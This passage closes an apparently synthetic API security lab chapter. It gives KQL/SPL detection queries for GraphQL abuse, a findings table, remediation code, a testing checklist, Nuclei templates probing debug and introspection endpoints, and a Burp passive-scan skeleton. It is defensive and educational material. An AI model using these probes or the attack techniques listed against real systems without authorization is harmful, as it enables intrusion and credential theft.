| where QueryDepth > 8 or QueryLength > 5000 or ResponseTime_ms > 10000
| project TimeGenerated, ClientIP, QueryDepth, QueryLength, ResponseTime_ms, StatusCode
| summarize
    ComplexQueries = count(),
    MaxDepth = max(QueryDepth),
    MaxLength = max(QueryLength),
    MaxResponseTime = max(ResponseTime_ms)
    by ClientIP, bin(TimeGenerated, 5m)

KQL Detection: Field Suggestion Enumeration

// Detect field enumeration via GraphQL suggestions
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL has "graphql" or URL has "/query"
| where StatusCode == 200
| where ResponseBody has "Did you mean"
| summarize
    SuggestionResponses = count(),
    UniqueQueries = dcount(RequestBody)
    by ClientIP, bin(TimeGenerated, 5m)
| where SuggestionResponses > 10

SPL Detection: GraphQL Attack Patterns

index=api_logs sourcetype=api_access uri_path="/query" OR uri_path="*graphql*"
| eval is_introspection=if(match(request_body, "__schema|__type|introspectionQuery"), 1, 0)
| eval is_batch=if(match(request_body, "^\["), 1, 0)
| eval query_depth=mvcount(split(request_body, "{")) - 1
| eval query_length=len(request_body)
| eval attack_type=case(
    is_introspection=1, "introspection",
    is_batch=1, "batching",
    query_depth > 8, "deep_query",
    query_length > 5000, "complex_query",
    match(request_body, "executeQuery|impersonateUser|resetUserPassword"), "sensitive_mutation",
    1=1, "normal")
| search attack_type!="normal"
| bin _time span=5m
| stats count as attempts, values(attack_type) as attack_types,
        max(query_depth) as max_depth by src_ip, _time
| sort -attempts

Defensive Recommendations

Securing GraphQL APIs

  1. Disable introspection in production — introspection should only be available in development environments
  2. Implement query depth limiting — reject queries exceeding a maximum depth (e.g., 7 levels)
  3. Implement query complexity analysis — assign costs to fields and reject queries exceeding a complexity budget (e.g., 1000 points)
  4. Disable or limit batching — either disable array-based batch requests or limit the number of operations per batch (e.g., 5)
  5. Disable field suggestions in production — prevent schema enumeration through error messages
  6. Implement field-level authorization — use middleware/directives to enforce access control on sensitive fields (@auth(requires: ADMIN))
  7. Remove dangerous mutations — executeQuery, impersonateUser, and clearCache should never be exposed through a public API; use internal admin tooling instead
  8. Implement query allowlisting (persisted queries) — in production, only allow pre-registered query hashes, rejecting arbitrary queries
  9. Set query timeout limits — abort queries that exceed a reasonable execution time (e.g., 5 seconds)
  10. Rate limit by operation, not by request — count each operation in a batch separately against rate limits
  11. Use DataLoader patterns — prevent N+1 query issues that amplify the impact of deep/wide queries
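Query allowlisting (item 8) can be sketched as a registry keyed by a hash of the approved query text. The example below is a minimal illustration, assuming SHA-256 over whitespace-normalized text; the `PersistedQueryRegistry` class and `query_hash` helper are hypothetical and do not reproduce any specific server's persisted-query protocol.

```python
import hashlib

def query_hash(query: str) -> str:
    """SHA-256 over the whitespace-normalized query text."""
    normalized = " ".join(query.split())
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()

class PersistedQueryRegistry:
    """Resolves client-supplied hashes to pre-registered query text."""

    def __init__(self, approved_queries):
        self._by_hash = {query_hash(q): q for q in approved_queries}

    def resolve(self, sha256_hash: str):
        """Return the registered query text, or None when the hash is unknown."""
        return self._by_hash.get(sha256_hash)

registry = PersistedQueryRegistry(["{ me { username } }"])

# A registered query resolves even if the client formatted it differently
print(registry.resolve(query_hash("{ me {\n  username\n} }")))
# An arbitrary query has no registered hash and is rejected
print(registry.resolve(query_hash("{ debugInfo { jwtSecret } }")))
```

Because clients send only a hash, introspection, deep nesting, and aliasing attacks have no way to reach the executor unless an equivalent query was registered at build time.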

Cross-Reference

For application security architecture patterns that prevent these issues by design, see Chapter 30: Application Security. For integrating GraphQL security testing into CI/CD pipelines, see Chapter 35: DevSecOps Pipeline.


Comprehensive Findings Summary

Findings by Severity

| # | Severity | Finding | OWASP API 2023 | Exercise |
|---|----------|---------|----------------|----------|
| 1 | Critical | Raw SQL execution via GraphQL mutation | API5, API8 | 5 |
| 2 | Critical | SSRF to cloud metadata — IAM credential theft | API7 | 3 |
| 3 | Critical | Algorithm None attack — complete auth bypass | API2 | 2 |
| 4 | Critical | Cross-tenant BOLA — tenant isolation broken | API1 | 2 |
| 5 | Critical | Mass assignment — role escalation to admin | API3 | 3 |
| 6 | Critical | Aliased batch credential extraction (hashes + MFA) | API1, API3 | 5 |
| 7 | Critical | Debug endpoints expose database credentials | API8 | 1 |
| 8 | Critical | Legacy v1 API — unsigned token forgery | API2, API9 | 2 |
| 9 | High | BOLA — user profile enumeration | API1 | 2 |
| 10 | High | Excessive data exposure — password hashes, MFA secrets | API3 | 3 |
| 11 | High | Function-level auth bypass — user impersonation | API5 | 2 |
| 12 | High | Blind SQL injection in sort parameter | API8 | 3 |
| 13 | High | Race condition — coupon double-spend | API6 | 4 |
| 14 | High | Race condition — financial overdraft | API6 | 4 |
| 15 | High | GraphQL introspection exposes full schema | API8 | 5 |
| 16 | High | Batching attack bypasses auth rate limit | API4, API2 | 5 |
| 17 | High | No GraphQL query depth/complexity limits | API4 | 5 |
| 18 | High | OAuth2 redirect URI validation bypass | API2 | 2 |
| 19 | High | OAuth2 scope escalation | API2 | 2 |
| 20 | Medium | Rate limit bypass via X-Forwarded-For | API4 | 4 |
| 21 | Medium | Rate limit bypass via URL encoding | API4 | 4 |
| 22 | Medium | No rate limiting on v1 API | API4, API9 | 4 |
| 23 | Medium | Payment step bypass in order workflow | API6 | 4 |
| 24 | Medium | Negative quantity creates account credits | API6 | 4 |
| 25 | Medium | Mass assignment — subscription upgrade bypass | API3, API6 | 3 |
| 26 | Medium | Field suggestion leaks schema details | API8 | 5 |
| 27 | Medium | GraphQL mutation authorization bypass | API5 | 5 |
| 28 | Medium | No file upload size limits | API4 | 4 |
| 29 | Medium | No pagination size limits | API4 | 4 |
| 30 | Low | Server/framework version disclosure | API8 | 1 |
| 31 | Low | Wildcard CORS policy | API8 | 1 |
| 32 | Low | Stack traces in error responses | API8 | 1 |
| 33 | Low | Verbose error messages reveal SQL queries | API8 | 1 |
| 34 | Low | GraphQL subscription cross-tenant access | API1 | 5 |

OWASP API Security Top 10 2023 Coverage

| Category | Findings | Status |
|----------|----------|--------|
| API1:2023 — Broken Object Level Authorization | 4, 6, 9, 34 | Tested |
| API2:2023 — Broken Authentication | 3, 8, 16, 18, 19 | Tested |
| API3:2023 — Broken Object Property Level Authorization | 5, 6, 10, 25 | Tested |
| API4:2023 — Unrestricted Resource Consumption | 16, 17, 20, 21, 22, 28, 29 | Tested |
| API5:2023 — Broken Function Level Authorization | 1, 11, 27 | Tested |
| API6:2023 — Unrestricted Access to Sensitive Business Flows | 13, 14, 23, 24, 25 | Tested |
| API7:2023 — Server Side Request Forgery | 2 | Tested |
| API8:2023 — Security Misconfiguration | 1, 7, 12, 15, 26, 30, 31, 32, 33 | Tested |
| API9:2023 — Improper Inventory Management | 8, 22 | Tested |
| API10:2023 — Unsafe Consumption of APIs | (Not directly tested) | Noted |

MITRE ATT&CK Mapping

| Technique ID | Technique Name | Exercises |
|--------------|----------------|-----------|
| T1190 | Exploit Public-Facing Application | 2, 3, 5 |
| T1078 | Valid Accounts | 2 |
| T1550.001 | Application Access Token | 2 |
| T1087 | Account Discovery | 1, 2 |
| T1069 | Permission Groups Discovery | 1, 5 |
| T1046 | Network Service Discovery | 3 |
| T1552.001 | Credentials In Files | 1, 3, 5 |
| T1552.004 | Private Keys | 1 |
| T1530 | Data from Cloud Storage | 3 |
| T1213 | Data from Information Repositories | 3, 5 |
| T1071.001 | Application Layer Protocol: Web Protocols | All |
| T1059 | Command and Scripting Interpreter | 5 |
| T1098 | Account Manipulation | 2, 3 |
| T1548 | Abuse Elevation Control Mechanism | 2, 3 |
| T1499 | Endpoint Denial of Service | 4, 5 |
| T1557 | Adversary-in-the-Middle | 2 |

Remediation Priority Matrix

Immediate Action Required (P0 — Fix Within 24 Hours)

  1. Disable debug endpoints — Remove /v2/debug/* routes from production
  2. Remove executeQuery GraphQL mutation — This provides unrestricted database access
  3. Fix JWT algorithm validation — Hardcode RS256, reject none and HS* algorithms
  4. Implement SSRF protections — Block internal IP ranges and metadata endpoints
  5. Remove UserCredentials from GraphQL schema — Never expose password hashes or MFA secrets
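
As an illustration of the JWT item above, the following is a minimal sketch of an algorithm allowlist check that runs before any signature verification. It assumes the API issues RS256 tokens only; the names `ALLOWED_ALGS`, `b64url_decode`, and `header_alg_is_allowed` are hypothetical and not part of NovaPlatform. It is a pre-check, not a replacement for verifying the signature (with PyJWT, the equivalent control is passing `algorithms=["RS256"]` to `jwt.decode`).

```python
import base64
import json

# Assumption: the API signs tokens with RS256 only.
ALLOWED_ALGS = frozenset({"RS256"})


def b64url_decode(segment: str) -> bytes:
    """Decode an unpadded base64url segment as used in JWTs."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def header_alg_is_allowed(token: str) -> bool:
    """Return True only if the JWT header declares an allowlisted algorithm.

    This does NOT verify the signature; it only rejects tokens whose
    header asks for "none", HS*, or anything else outside the allowlist.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return False
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError:  # covers bad base64, bad UTF-8, and bad JSON
        return False
    if not isinstance(header, dict):
        return False
    alg = header.get("alg")
    # Exact, case-sensitive match: "none", "None", and "HS256" all fail.
    return isinstance(alg, str) and alg in ALLOWED_ALGS


def make_unsigned_test_token(header: dict) -> str:
    """Build a syntactically valid token with a dummy signature (tests only)."""
    def enc(obj: dict) -> str:
        raw = json.dumps(obj).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return "{}.{}.{}".format(enc(header), enc({"sub": "testuser"}), "sig")


if __name__ == "__main__":
    for alg in ("RS256", "HS256", "none"):
        token = make_unsigned_test_token({"alg": alg, "typ": "JWT"})
        print(alg, header_alg_is_allowed(token))
```

The check is deliberately an allowlist rather than a blocklist of `none` and `HS*`, so that unexpected values such as case variants are rejected by default.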

High Priority (P1 — Fix Within 1 Week)

  1. Implement object-level authorization — Add tenant and ownership checks to every endpoint
  2. Fix mass assignment — Use explicit allowlists for writable fields on PATCH/PUT endpoints
  3. Implement response filtering — Create DTOs that exclude sensitive fields
  4. Disable GraphQL introspection — Only enable in development environments
  5. Fix rate limiting — Rate limit by authenticated identity, normalize URLs first
  6. Decommission v1 API — Or apply JWT authentication and rate limiting
  7. Fix OAuth2 redirect URI validation — Enforce exact match on registered URIs
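
The mass assignment fix above can be sketched as an explicit allowlist applied to every PATCH/PUT body before it reaches the data layer. The field names and the `filter_writable` helper below are hypothetical; the actual writable fields depend on the NovaPlatform data model.

```python
# Hypothetical allowlist: only these user fields may be changed by the client.
WRITABLE_USER_FIELDS = frozenset({"display_name", "email", "timezone"})


def filter_writable(payload, allowed=WRITABLE_USER_FIELDS):
    """Split a request body into accepted fields and rejected field names.

    Returns (accepted_dict, sorted_rejected_names). Anything not on the
    allowlist (for example "role" or "tenant_id") is never applied.
    """
    accepted = {key: value for key, value in payload.items() if key in allowed}
    rejected = sorted(key for key in payload if key not in allowed)
    return accepted, rejected


if __name__ == "__main__":
    body = {"display_name": "Test User", "role": "admin", "tenant_id": "tenant-002"}
    accepted, rejected = filter_writable(body)
    print(accepted)   # fields that may be written
    print(rejected)   # fields to reject and log
```

Returning the rejected names separately leaves the policy decision to the caller: one option is to respond with 400 when the list is non-empty, and logging it gives the detection rules a signal that someone is probing protected properties.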

Medium Priority (P2 — Fix Within 1 Month)

  1. Implement GraphQL query complexity limits — Set depth, complexity, and batch size limits
  2. Fix race conditions — Use database-level locks and idempotency keys
  3. Validate business logic — Enforce workflow state machines, reject negative quantities
  4. Implement file upload limits — Set per-file and per-tenant storage limits
  5. Implement pagination limits — Cap per_page at a reasonable maximum
  6. Disable GraphQL field suggestions — Prevent schema enumeration
  7. Sanitize error responses — Remove stack traces, SQL queries, and internal paths
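
For the race condition and business logic items above, one possible shape of the fix is to let a database uniqueness constraint enforce idempotency and to validate quantities before any write. The sketch below uses an in-memory SQLite database purely for illustration; the `redemptions` table, the coupon scenario, and the function names are assumptions, not the lab application's schema.

```python
import sqlite3


def open_store():
    """Create an in-memory table keyed by idempotency key (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE redemptions ("
        " idempotency_key TEXT PRIMARY KEY,"
        " coupon_code TEXT NOT NULL,"
        " quantity INTEGER NOT NULL CHECK (quantity > 0))"
    )
    return conn


def redeem(conn, idempotency_key, coupon_code, quantity):
    """Apply a redemption at most once per idempotency key.

    Returns "applied", "duplicate", or "rejected".
    """
    # Business-rule validation: negative or zero quantities are never valid.
    if not isinstance(quantity, int) or quantity <= 0:
        return "rejected"
    try:
        # "with conn" commits on success and rolls back on an exception.
        with conn:
            conn.execute(
                "INSERT INTO redemptions (idempotency_key, coupon_code, quantity)"
                " VALUES (?, ?, ?)",
                (idempotency_key, coupon_code, quantity),
            )
    except sqlite3.IntegrityError:
        # The PRIMARY KEY constraint rejected a replayed or concurrent request.
        return "duplicate"
    return "applied"


if __name__ == "__main__":
    store = open_store()
    print(redeem(store, "key-001", "SAVE10", 1))
    print(redeem(store, "key-001", "SAVE10", 1))
    print(redeem(store, "key-002", "SAVE10", -5))
```

The important design choice is that the duplicate check is the insert itself rather than a separate "does this key exist" query, since a check-then-write sequence is exactly the window a race condition exploits.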

Tools and Automation

API Security Testing Checklist

Use this checklist for future API security assessments:

## Pre-Engagement
- [ ] Scope definition (endpoints, methods, auth mechanisms)
- [ ] Test accounts provisioned across roles and tenants
- [ ] Emergency contacts and communication plan established

## Reconnaissance
- [ ] OpenAPI/Swagger specification retrieved and analyzed
- [ ] Undocumented endpoints discovered (fuzzing)
- [ ] Legacy/shadow API versions identified
- [ ] Technology stack fingerprinted
- [ ] Error response verbosity analyzed

## Authentication
- [ ] JWT algorithm confusion tested (none, RS256→HS256)
- [ ] JWT kid parameter injection tested
- [ ] Token expiration and refresh flow tested
- [ ] OAuth2 redirect URI validation tested
- [ ] OAuth2 scope escalation tested
- [ ] API key entropy and rotation tested

## Authorization
- [ ] BOLA on all CRUD endpoints tested
- [ ] Cross-tenant access tested
- [ ] Function-level authorization (admin endpoints) tested
- [ ] Mass assignment tested on all PATCH/PUT endpoints

## Injection & Data Exposure
- [ ] SQL injection in all parameters tested
- [ ] NoSQL injection in search/filter parameters tested
- [ ] SSRF via URL parameters tested
- [ ] Excessive data exposure analyzed
- [ ] Sensitive fields in responses identified

## Rate Limiting & Business Logic
- [ ] Rate limit configuration mapped
- [ ] Rate limit bypass techniques tested
- [ ] Race conditions on critical operations tested
- [ ] Business logic flaws tested
- [ ] Resource exhaustion limits tested

## GraphQL (if applicable)
- [ ] Introspection availability tested
- [ ] Query depth limits tested
- [ ] Query complexity limits tested
- [ ] Batching attacks tested
- [ ] Field suggestion enumeration tested
- [ ] Resolver-level authorization tested
- [ ] Subscription authorization tested

## Reporting
- [ ] All findings mapped to OWASP API Top 10 2023
- [ ] All findings mapped to MITRE ATT&CK
- [ ] Remediation priorities assigned
- [ ] Detection queries provided
- [ ] Retesting plan defined

Nuclei Templates for API Security

# nuclei-api-debug-endpoints.yaml (SYNTHETIC - educational only)
id: api-debug-endpoints
info:
  name: API Debug Endpoints Exposure
  author: NovaTech Security Team
  severity: critical
  description: Detects exposed debug endpoints in API deployments
  tags: api, misconfiguration, debug

requests:
  - method: GET
    path:
      - "{{BaseURL}}/debug/config"
      - "{{BaseURL}}/debug/routes"
      - "{{BaseURL}}/debug/query"
      - "{{BaseURL}}/debug/sql-stats"
      - "{{BaseURL}}/internal/metrics"
      - "{{BaseURL}}/actuator"
      - "{{BaseURL}}/actuator/env"
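    # Require BOTH matchers to hit; Nuclei combines multiple matchers with OR by default,
    # so without this any 200 response would be reported
    matchers-condition: and
    matchers: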
      - type: status
        status:
          - 200
      - type: word
        words:
          - "database"
          - "password"
          - "secret"
          - "connection_string"
        condition: or

# nuclei-graphql-introspection.yaml (SYNTHETIC - educational only)
id: graphql-introspection
info:
  name: GraphQL Introspection Enabled
  author: NovaTech Security Team
  severity: high
  description: Detects enabled GraphQL introspection in production
  tags: api, graphql, misconfiguration

requests:
  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/query"
      - "{{BaseURL}}/api/graphql"
    headers:
      Content-Type: application/json
    body: '{"query":"{ __schema { types { name } } }"}'
    # Require both the body match and the 200 status (default is OR)
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "__schema"
          - "types"
        condition: and
      - type: status
        status:
          - 200

Burp Suite Extension Configuration for API Testing

# Burp Suite extension helper for API security testing (SYNTHETIC - educational only)
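# Save as api_security_checks.py and load in Burp Extender
# Python extensions run under Jython (Python 2.7 syntax), so Burp must be
# configured with a Jython standalone JAR before loading this file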

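"""
API Security Scan Checks

Implemented below (passive): excessive data exposure indicators in responses.

Planned active checks (not implemented in this skeleton):
1. JWT algorithm confusion
2. BOLA via ID manipulation
3. Mass assignment detection
4. GraphQL introspection check
5. SSRF via URL parameters
"""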

from burp import IBurpExtender, IScannerCheck
from java.io import PrintWriter
import re
import base64
import json

class BurpExtender(IBurpExtender, IScannerCheck):

    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("API Security Checks (Synthetic)")
        callbacks.registerScannerCheck(self)

        self.stdout = PrintWriter(callbacks.getStdout(), True)
        self.stdout.println("API Security Checks loaded (SYNTHETIC)")

    def doPassiveScan(self, baseRequestResponse):
        issues = []

        response = baseRequestResponse.getResponse()
        if response is None:
            # Nothing to inspect (the request has no recorded response)
            return issues
        response_info = self._helpers.analyzeResponse(response)
        body = self._helpers.bytesToString(
            response[response_info.getBodyOffset():]
        )

        # Check for excessive data exposure indicators
        sensitive_patterns = [
            r'"password_hash"', r'"mfa_secret"', r'"api_key"',
            r'"secret_key"', r'"ssn"', r'"credit_card"',
            r'"\$2[aby]\$\d+\$'  # bcrypt hash pattern
        ]

        for pattern in sensitive_patterns:
            if re.search(pattern, body, re.IGNORECASE):
                # Report issue (implementation details omitted for brevity)
                # str.format is used because Jython 2.7 does not support f-strings
                self.stdout.println("[!] Sensitive data pattern found: {}".format(pattern))

        return issues

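    def doActiveScan(self, baseRequestResponse, insertionPoint):
        # Active checks would go here
        return []

    def consolidateDuplicateIssues(self, existingIssue, newIssue):
        # Required by IScannerCheck: -1 keeps only the existing issue,
        # 0 reports both issues
        if existingIssue.getIssueName() == newIssue.getIssueName():
            return -1
        return 0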
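
The pattern matching at the core of the passive check can also be exercised outside Burp. The following standalone Python 3 sketch mirrors the extension's regular expressions against a synthetic response body; the `SENSITIVE_PATTERNS` labels and the `find_sensitive_fields` function are hypothetical helpers for illustration, not part of the Burp API.

```python
import re

# Label -> regex, taken from a subset of the extension's sensitive_patterns.
SENSITIVE_PATTERNS = {
    "password_hash": r'"password_hash"',
    "mfa_secret": r'"mfa_secret"',
    "api_key": r'"api_key"',
    "bcrypt_hash": r'"\$2[aby]\$\d+\$',  # value that looks like a bcrypt hash
}


def find_sensitive_fields(body):
    """Return the labels of all sensitive patterns present in a response body."""
    return [
        label
        for label, pattern in SENSITIVE_PATTERNS.items()
        if re.search(pattern, body, re.IGNORECASE)
    ]


if __name__ == "__main__":
    # SYNTHETIC response body; the hash value is a placeholder, not a real hash.
    sample = '{"id": 1, "password_hash": "$2b$12$REDACTEDREDACTEDREDACTED"}'
    print(find_sensitive_fields(sample))
    print(find_sensitive_fields('{"id": 1, "display_name": "Test User"}'))
```

Keeping the patterns in a labeled mapping makes it easier to name the offending field in a reported issue and to unit test new patterns before loading them into the extension.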

Lab Wrap-Up

Key Takeaways

  1. API security requires defense-in-depth — no single control prevents all attacks. Authentication, authorization, input validation, rate limiting, and output filtering must all work together.

  2. GraphQL introduces unique attack surfaces — introspection, batching, query complexity, and field suggestions create attack vectors that do not exist in REST APIs. GraphQL APIs require specialized security controls.

  3. Legacy APIs are a hidden risk — the v1 API with weak authentication was the easiest path to compromise. API inventory management and version decommissioning are critical security practices.

  4. OWASP API Top 10 2023 provides a practical framework — every finding in this lab maps to at least one OWASP API category. Use it as a testing checklist and a remediation guide.

  5. Business logic flaws are largely invisible to automated scanners — race conditions, workflow manipulation, and negative value abuse require manual testing and deep understanding of the application's business rules.

  6. Mass assignment is pervasive and underestimated — when APIs accept arbitrary JSON fields without allowlisting, attackers can modify protected properties including roles, subscription tiers, and tenant associations.

  7. SSRF in API features is high-impact — any API feature that makes server-side HTTP requests (webhooks, integrations, imports) is a potential SSRF vector that can reach cloud metadata services and internal infrastructure.
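
To make the SSRF takeaway concrete, here is a minimal sketch of a destination check for a webhook-style feature. It assumes the caller has already resolved the hostname and passes in the resulting addresses; `webhook_target_allowed`, `is_internal`, and `ALLOWED_SCHEMES` are hypothetical names. It treats every address that Python's `ipaddress` module does not consider globally routable as internal, which covers RFC 1918 ranges, loopback, and the 169.254.169.254 metadata address.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: webhooks may only be delivered over HTTPS.
ALLOWED_SCHEMES = frozenset({"https"})


def is_internal(ip_text):
    """Return True for any address that is not globally routable."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return True  # fail closed on anything that is not a valid IP
    # Unwrap IPv4-mapped IPv6 (e.g. ::ffff:10.0.0.1) before classifying.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return not ip.is_global


def webhook_target_allowed(url, resolved_ips):
    """Check scheme, hostname, and every resolved address of a target URL."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if not resolved_ips:
        return False  # unresolved hosts are rejected rather than trusted
    # One internal address among the results is enough to reject the URL.
    return not any(is_internal(ip) for ip in resolved_ips)


if __name__ == "__main__":
    # SYNTHETIC examples: the cloud metadata address and an internal host.
    print(webhook_target_allowed("https://hooks.example.com/cb", ["169.254.169.254"]))
    print(webhook_target_allowed("https://hooks.example.com/cb", ["10.50.0.10"]))
```

A check like this only helps if the HTTP client then connects to the same address that was validated; resolving once for validation and again for the request leaves room for DNS rebinding. Redirects need the same check applied to each hop.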

Skills Practiced

| Skill | Exercises | Tools Used |
|---|---|---|
| API reconnaissance and documentation analysis | 1 | curl, ffuf, kiterunner, jq |
| JWT token analysis and manipulation | 2 | jwt_tool, Python PyJWT |
| Authorization testing (BOLA, BFLA) | 2, 5 | curl, Python requests |
| SQL injection via API | 3 | sqlmap, curl |
| Mass assignment testing | 3 | curl, Burp Suite |
| SSRF exploitation | 3 | curl, Python requests |
| Rate limit analysis and bypass | 4 | curl, Python asyncio |
| Race condition exploitation | 4 | Python asyncio/aiohttp |
| Business logic testing | 4 | curl, Burp Suite |
| GraphQL security testing | 5 | curl, InQL, Python |
| Detection rule writing (KQL/SPL) | All | Sentinel, Splunk |

Further Reading

Related Chapters and Resources


What's Next?

After completing this lab, test your knowledge with the Chapter 30 Quiz and explore the Purple Team API Security Exercises for collaborative red/blue team scenarios targeting API infrastructure.